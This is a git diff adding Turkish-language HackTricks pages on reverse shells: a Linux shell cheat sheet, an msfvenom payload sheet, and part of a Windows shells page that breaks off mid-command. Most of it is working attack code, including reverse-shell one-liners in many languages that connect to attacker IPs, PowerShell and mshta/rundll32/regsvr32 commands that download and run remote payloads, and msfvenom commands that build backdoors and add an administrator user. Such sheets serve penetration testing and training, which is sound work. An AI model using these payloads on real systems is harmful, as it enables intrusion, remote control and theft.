+import httpx + +def execute(command: str, timeout: float = None) -> str: +# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution +token = jwt.encode( +{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256" +) + +response = httpx.get( +url="https://vulnerable.io:3200", +headers={"Authorization": f"Bearer {token}"}, +timeout=timeout, +# ||BURP|| +verify=False, +) + +# Check if the request was successful +response.raise_for_status() + +return response.text +``` +Ve sonra, şunu çalıştırabilirsiniz: +```shell +toboggan -m nix.py -i +``` +Doğrudan etkileşimli bir shell kullanmak için. Burpsuite entegrasyonu için `-b` ekleyebilir ve daha temel bir rce wrapper için `-i`'yi kaldırabilirsiniz. + +Başka bir olasılık, `IppSec` ileri shell uygulamasını kullanmaktır [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell). + +Sadece şunları değiştirmeniz gerekiyor: + +* Zayıf hedefin URL'si +* Yükünüzün ön eki ve son eki (varsa) +* Yükün gönderilme şekli (başlıklar? veri? ek bilgi?) + +Sonra, sadece **komutlar gönderebilir** veya hatta **tam bir PTY almak için `upgrade` komutunu kullanabilirsiniz** (boruların yaklaşık 1.3 saniyelik bir gecikme ile okunduğunu ve yazıldığını unutmayın). + +## Netcat +```bash +nc -e /bin/sh +nc | /bin/sh #Blind +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f +nc | /bin/bash | nc +rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe +``` +## gsocket + +Bunu [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/) adresinde kontrol edin. +```bash +bash -c "$(curl -fsSL gsocket.io/x)" +``` +## Telnet +```bash +telnet | /bin/sh #Blind +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet >/tmp/f +telnet | /bin/bash | telnet +rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe +``` +## Whois + +**Saldırgan** +```bash +while true; do nc -l ; done +``` +Komutu göndermek için yazın, enter tuşuna basın ve CTRL+D'ye basın (STDIN'i durdurmak için) + +**Kurban** +```bash +export X=Connected; while true; do X=`eval $(whois -h -p "Output: $X")`; sleep 1; done +``` +## Python +```bash +#Linux +export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' +#IPv6 +python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' +``` +## Perl +```bash +perl -e 'use Socket;$i="";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' +``` +## Ruby +```bash +ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' +ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' +``` +## PHP +```php +// Using 'exec' is the most common method, but assumes that the file descriptor will be 3. +// Using this method may lead to instances where the connection reaches out to the listener and then closes. +php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' + +// Using 'proc_open' makes no assumptions about what the file descriptor will be. +// See https://security.stackexchange.com/a/198944 for more information +$sock, 1=>$sock, 2=>$sock), $pipes); ?> + +/dev/tcp/10.10.14.8/4444 0>&1'"); ?> +``` +## Java +```bash +r = Runtime.getRuntime() +p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) +p.waitFor() +``` +## Ncat +```bash +victim> ncat --ssl -c "bash -i 2>&1" +attacker> ncat -l --ssl +``` +## Golang +```bash +echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go +``` +## Lua +```bash +#Linux +lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" +#Windows & Linux +lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +``` +## NodeJS +```javascript +(function(){ +var net = require("net"), +cp = require("child_process"), +sh = cp.spawn("/bin/sh", []); +var client = new net.Socket(); +client.connect(8080, "10.17.26.64", function(){ +client.pipe(sh.stdin); +sh.stdout.pipe(client); +sh.stderr.pipe(client); +}); +return /a/; // Prevents the Node.js application form crashing +})(); + + +or + +require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]') +require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'") + +or + +-var x = global.process.mainModule.require +-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash') + +or + +// If you get to the constructor of a function you can define and execute another function inside a string +"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")() +"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")() + + +or + +// Abuse this syntax to get a reverse shell +var fs = this.process.binding('fs'); +var fs = process.binding('fs'); + +or + +https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py +``` +## OpenSSL + +Saldırgan (Kali) +```bash +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response +``` +Kurban +```bash +#Linux +openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : + +#Windows +openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect : +``` +## **Socat** + +[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries) + +### Bağlı shell +```bash +victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane +attacker> socat FILE:`tty`,raw,echo=0 TCP::1337 +``` +### Ters kabuk +```bash +attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0 +victim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane +``` +## Awk +```bash +awk 'BEGIN {s = "/inet/tcp/0//"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null +``` +## Finger + +**Saldırgan** +```bash +while true; do nc -l 79; done +``` +Komutu göndermek için yazın, enter tuşuna basın ve CTRL+D'ye basın (STDIN'i durdurmak için) + +**Kurban** +```bash +export X=Connected; while true; do X=`eval $(finger "$X"@ 2> /dev/null')`; sleep 1; done + +export X=Connected; while true; do X=`eval $(finger "$X"@ 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done +``` +## Gawk +```bash +#!/usr/bin/gawk -f + +BEGIN { +Port = 8080 +Prompt = "bkd> " + +Service = "/inet/tcp/" Port "/0/0" +while (1) { +do { +printf Prompt |& Service +Service |& getline cmd +if (cmd) { +while ((cmd |& getline) > 0) +print $0 |& Service +close(cmd) +} +} while (cmd != "exit") +close(Service) +} +} +``` +## Xterm + +Bu, sisteminize 6001 numaralı portta bağlanmaya çalışacaktır: +```bash +xterm -display 10.0.0.1:1 +``` +Aşağıdaki komutu kullanarak ters kabuğu yakalayabilirsiniz (6001 numaralı portta dinleyecektir): +```bash +# Authorize host +xhost +targetip +# Listen +Xnest :1 +``` +## Groovy + +by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOT: Java ters kabuk Groovy için de çalışır +```bash +String host="localhost"; +int port=8044; +String cmd="cmd.exe"; +Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); +``` +## Referanslar + +* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) +* [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell) +* [https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/](https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/) +* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) + +**Try Hard Güvenlik Grubu** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +{% hint style="success" %} +AWS Hacking'i öğrenin ve pratik yapın:[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP Hacking'i öğrenin ve pratik yapın: [**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +HackTricks'i Destekleyin + +* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! +* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.** +* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/msfvenom.md b/generic-methodologies-and-resources/reverse-shells/msfvenom.md new file mode 100644 index 000000000..0f8021152 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/msfvenom.md @@ -0,0 +1,240 @@ +# MSFVenom - CheatSheet + +{% hint style="success" %} +AWS Hacking öğrenin ve pratik yapın:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP Hacking öğrenin ve pratik yapın: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +HackTricks'i Destekleyin + +* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! +* **Bize katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya **bizi** **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.** +* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin. + +
+{% endhint %} + +
+ +Deneyimli hackerlar ve bug bounty avcıları ile iletişim kurmak için [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) sunucusuna katılın! + +**Hacking İçgörüleri**\ +Hacking'in heyecanı ve zorluklarına dalan içeriklerle etkileşimde bulunun + +**Gerçek Zamanlı Hack Haberleri**\ +Gerçek zamanlı haberler ve içgörülerle hızlı tempolu hacking dünyasında güncel kalın + +**Son Duyurular**\ +Yeni başlayan bug bounty'ler ve önemli platform güncellemeleri hakkında bilgi sahibi olun + +**Bize katılın** [**Discord**](https://discord.com/invite/N3FrSbmwdy) ve bugün en iyi hackerlarla işbirliği yapmaya başlayın! + +*** + +## Temel msfvenom + +`msfvenom -p -e -f -i LHOST=` + +Ayrıca mimariyi belirtmek için `-a` veya `--platform` kullanılabilir. + +## Listeleme +```bash +msfvenom -l payloads #Payloads +msfvenom -l encoders #Encoders +``` +## Shellcode oluştururken yaygın parametreler +```bash +-b "\x00\x0a\x0d" +-f c +-e x86/shikata_ga_nai -i 5 +EXITFUNC=thread +PrependSetuid=True #Use this to create a shellcode that will execute something with SUID +``` +## **Windows** + +### **Ters Shell** + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe +``` +### Bind Shell +```bash +msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe +``` +### Kullanıcı Oluştur + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe +``` +{% endcode %} + +### CMD Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe +``` +### **Komut Çalıştır** + +{% code overflow="wrap" %} +```bash +msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe +msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe +``` +### Kodlayıcı +```bash +msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe +``` +{% endcode %} + +### Çalıştırılabilir dosya içinde gömülü + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe +``` +{% endcode %} + +## Linux Yükleri + +### Ters Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf +msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf +``` +{% endcode %} + +### Bind Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf +``` +{% endcode %} + +### SunOS (Solaris) + +{% code overflow="wrap" %} +```bash +msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf +``` +{% endcode %} + +## **MAC Yükleri** + +### **Ters Kabuk:** + +{% code overflow="wrap" %} +```bash +msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho +``` +{% endcode %} + +### **Bind Shell** + +{% code overflow="wrap" %} +```bash +msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho +``` +{% endcode %} + +## **Web Tabanlı Yükler** + +### **PHP** + +#### Ters shel**l** + +{% code overflow="wrap" %} +```bash +msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php +cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php +``` +{% endcode %} + +### ASP/x + +#### Ters kabuk + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx +``` +{% endcode %} + +### JSP + +#### Ters kabuk + +{% code overflow="wrap" %} +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp +``` +{% endcode %} + +### WAR + +#### Ters Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war +``` +{% endcode %} + +### NodeJS +```bash +msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) +``` +## **Script Dili yükleri** + +### **Perl** + +{% code overflow="wrap" %} +```bash +msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl +``` +### **Python** +```bash +msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py +``` +### **Bash** +```bash +msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh +``` +{% endcode %} + +
+ +Deneyimli hackerlar ve bug bounty avcıları ile iletişim kurmak için [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) sunucusuna katılın! + +**Hacking İçgörüleri**\ +Hacking'in heyecanı ve zorluklarına dalan içeriklerle etkileşimde bulunun + +**Gerçek Zamanlı Hack Haberleri**\ +Gerçek zamanlı haberler ve içgörülerle hızlı tempolu hacking dünyasında güncel kalın + +**Son Duyurular**\ +Yeni başlayan bug bounty'ler ve önemli platform güncellemeleri hakkında bilgi sahibi olun + +**Bize katılın** [**Discord**](https://discord.com/invite/N3FrSbmwdy) ve bugün en iyi hackerlarla işbirliği yapmaya başlayın! + +{% hint style="success" %} +AWS Hacking'i öğrenin ve pratik yapın:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP Hacking'i öğrenin ve pratik yapın: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +HackTricks'i Destekleyin + +* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! +* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter**'da **bizi takip edin** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/windows.md b/generic-methodologies-and-resources/reverse-shells/windows.md new file mode 100644 index 000000000..802ebd4ff --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/windows.md @@ -0,0 +1,506 @@ +# Shells - Windows + +{% hint style="success" %} +AWS Hacking'i öğrenin ve pratik yapın:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP Hacking'i öğrenin ve pratik yapın: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +HackTricks'i Destekleyin + +* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! +* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.** +* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin. + +
+{% endhint %} + +**Try Hard Security Group** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +*** + +## Lolbas + +Sayfa [lolbas-project.github.io](https://lolbas-project.github.io/) Windows için, [https://gtfobins.github.io/](https://gtfobins.github.io/) ise Linux içindir.\ +Açıkça, **Windows'ta SUID dosyaları veya sudo ayrıcalıkları yoktur**, ancak bazı **ikili dosyaların** nasıl (kötüye) kullanılabileceğini bilmek faydalıdır, böylece bazı beklenmedik eylemleri gerçekleştirmek için **rastgele kod çalıştırma** gibi. + +## NC +```bash +nc.exe -e cmd.exe +``` +## NCAT +kurban +``` +ncat.exe -e "cmd.exe /c (cmd.exe 2>&1)" +#Encryption to bypass firewall +ncat.exe --ssl -e "cmd.exe /c (cmd.exe 2>&1)" +``` +saldırgan +``` +ncat -l +#Encryption to bypass firewall +ncat -l --ssl +``` +## SBD + +**[sbd](https://www.kali.org/tools/sbd/) taşınabilir ve güvenli bir Netcat alternatifidir**. Unix benzeri sistemlerde ve Win32'de çalışır. Güçlü şifreleme, program yürütme, özelleştirilebilir kaynak portları ve sürekli yeniden bağlantı gibi özelliklerle, sbd TCP/IP iletişimi için çok yönlü bir çözüm sunar. Windows kullanıcıları için, Kali Linux dağıtımından sbd.exe sürümü Netcat için güvenilir bir alternatif olarak kullanılabilir. +```bash +# Victims machine +sbd -l -p 4444 -e bash -v -n +listening on port 4444 + + +# Atackers +sbd 10.10.10.10 4444 +id +uid=0(root) gid=0(root) groups=0(root) +``` +## Python +```bash +#Windows +C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" +``` +## Perl +```bash +perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' +``` +## Ruby +```bash +#Windows +ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' +``` +## Lua +```bash +lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +``` +## OpenSSH + +Saldırgan (Kali) +```bash +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response +``` +Kurban +```bash +#Linux +openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : + +#Windows +openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect : +``` +## Powershell +```bash +powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" +powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')" +Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')" +echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile +``` +Ağ çağrısı gerçekleştiren işlem: **powershell.exe**\ +Diskte yazılan yük: **HAYIR** (_en azından procmon kullanarak bulduğum hiçbir yerde !_ ) +```bash +powershell -exec bypass -f \\webdavserver\folder\payload.ps1 +``` +Ağ çağrısı gerçekleştiren işlem: **svchost.exe**\ +Diskte yazılan yük: **WebDAV istemcisi yerel önbelleği** + +**Tek satır:** +```bash +$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +``` +**Bu belgenin sonunda farklı Powershell Shell'leri hakkında daha fazla bilgi edinin** + +## Mshta + +* [Buradan](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) +``` + +```bash +mshta http://webserver/payload.hta +``` + +```bash +mshta \\webdavserver\folder\payload.hta +``` +#### **hta-psh ters kabuk örneği (hta kullanarak PS arka kapısını indirin ve çalıştırın)** +```xml + +``` +**Koadic zombi'yi stager hta kullanarak çok kolay bir şekilde indirebilir ve çalıştırabilirsiniz.** + +#### hta örneği + +[**Buradan**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f) +```xml + + + + + + + + + +``` +#### **mshta - sct** + +[**Buradan**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) +```xml + + + + + + + + + +``` +#### **Mshta - Metasploit** +```bash +use exploit/windows/misc/hta_server +msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 +msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109 +msf exploit(windows/misc/hta_server) > exploit +``` + +```bash +Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit +``` +**Defansör tarafından tespit edildi** + + + + +## **Rundll32** + +[**Dll merhaba dünya örneği**](https://github.com/carterjones/hello-world-dll) + +* [Buradan](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +rundll32 \\webdavserver\folder\payload.dll,entrypoint +``` + +```bash +rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); +``` +**Defansör tarafından tespit edildi** + +**Rundll32 - sct** + +[**Buradan**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) +```xml + + + + + + + + +``` +#### **Rundll32 - Metasploit** +```bash +use windows/smb/smb_delivery +run +#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0 +``` +**Rundll32 - Koadic** +```bash +use stager/js/rundll32_js +set SRVHOST 192.168.1.107 +set ENDPOINT sales +run +#Koadic will tell you what you need to execute inside the victim, it will be something like: +rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close(); +``` +## Regsvr32 + +* [Buradan](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll +``` + +``` +regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct 